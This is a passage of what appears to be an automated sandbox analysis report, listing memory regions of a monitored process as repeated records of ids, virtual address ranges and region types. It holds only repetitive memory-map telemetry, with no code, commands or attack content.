entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7095 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7096 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7097 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7098 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7099 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7100 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7101 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7102 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7103 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7104 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7105 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7106 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7107 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7108 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7109 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7110 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7111 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7112 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7113 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7114 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7115 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7116 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7117 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7118 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7119 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7120 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7121 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7122 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7123 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7124 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7125 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7126 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7127 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7128 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7129 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7130 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7131 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7132 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7133 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7134 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7135 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7136 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7137 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7138 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7139 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7140 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7141 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7142 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7143 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7144 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7145 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7146 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7147 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7148 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7149 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7150 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7151 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7152 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7153 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7154 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7155 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7156 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7157 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7158 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7159 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7160 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7161 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7162 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7163 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7164 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7165 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7166 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7167 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7168 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7169 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7170 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7171 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7172 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7173 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7174 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7175 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7176 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7177 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7178 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7179 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7180 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7181 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7182 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7183 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7184 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7185 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7186 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7187 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7188 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7189 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7190 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7191 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7192 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7193 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7194 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7195 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7196 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7197 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7198 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7199 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7200 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7201 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7202 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7203 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7204 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7205 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7206 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7207 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7208 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7209 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7210 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7211 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7212 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7213 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7214 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7215 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7216 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7217 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7218 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7219 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7220 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7221 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7222 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7223 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7224 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7225 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7226 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7227 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7228 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7229 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7230 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7231 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7232 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7233 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7234 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7235 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7236 start_va = 0x400000 end_va = 0x402fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7237 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7238 start_va = 0x9bc0000 end_va = 0xa0b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bc0000" filename = "" Region: id = 7239 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7240 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7241 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7242 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7243 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7244 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7245 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7246 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7247 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7248 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7249 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7250 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7251 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7252 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7253 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7254 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7255 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7256 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7257 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7258 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7259 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7260 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7261 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7262 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7263 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7264 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7265 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7266 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7267 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7268 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7269 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7270 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7271 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7272 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7273 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7274 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7275 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7276 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7277 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7278 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7279 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7280 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7281 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7282 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7283 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7284 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7285 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7286 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7287 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7288 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7289 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7290 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7291 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7292 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 7293 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 